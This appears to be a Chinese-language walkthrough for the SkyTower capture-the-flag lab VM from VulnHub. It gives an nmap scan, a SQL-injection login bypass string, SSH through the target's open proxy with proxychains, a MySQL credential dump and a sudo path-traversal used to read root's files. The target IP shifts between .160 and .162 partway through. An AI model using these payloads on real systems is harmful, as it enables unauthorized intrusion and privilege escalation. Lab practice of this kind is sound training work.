项目地址
https://download.vulnhub.com/skytower/SkyTower.zip
项目配置
我们下载一个VirtualBox,这是官网
Downloads – Oracle VirtualBox
安装到默认路径就行
打开后点击注册
选择解压后的vbox文件
然后点击左上角管理
点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步
就得到了一个iso镜像文件
实验过程
将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机ip和端口
nmap 192.168.47.0-254
根据对比可知SkyTower的ip地址为192.168.47.160,开放了22,80,3128端口
访问网站
发现是个登录界面
发现登录框,我们测sql注入
邮箱随便输入一个,密码我们输入
123'|| 1=1 #
爆出了一个默认用户
尝试登录发现登录失败
因为开放22端口,尝试一下ssh登录
连接不上
还有个3128端口,挂上代理尝试一下
vim /etc/proxychains4.conf
然后使用代理连接
proxychains ssh john@192.168.47.162 -t "/bin/sh"
连接成功
提权
sudo -l
发现没有权限
想起刚才login.php存在sql注入
查看一下
发现一个数据库
尝试登录
mysql -u root SkyTech -p
登录成功
四处翻翻
show databases;
use SkyTech;
show tables;
select * from login;
发现了另外一个用户sara
使用这个用户登录看看
proxychains ssh sara@192.168.47.162 -t "/bin/sh"
登录成功
sudo -l
发现/accounts/*有权限
pwd
ls ..
ls ../..
找到accounts在根目录下
我们利用accounts/有权限,查看root下有啥
sudo ls /accounts/../root
查看flag.txt文件
得到了root账户的密码
再次ssh连接root用户
proxychains ssh root@192.168.47.162 -t "/bin/sh"
提权成功
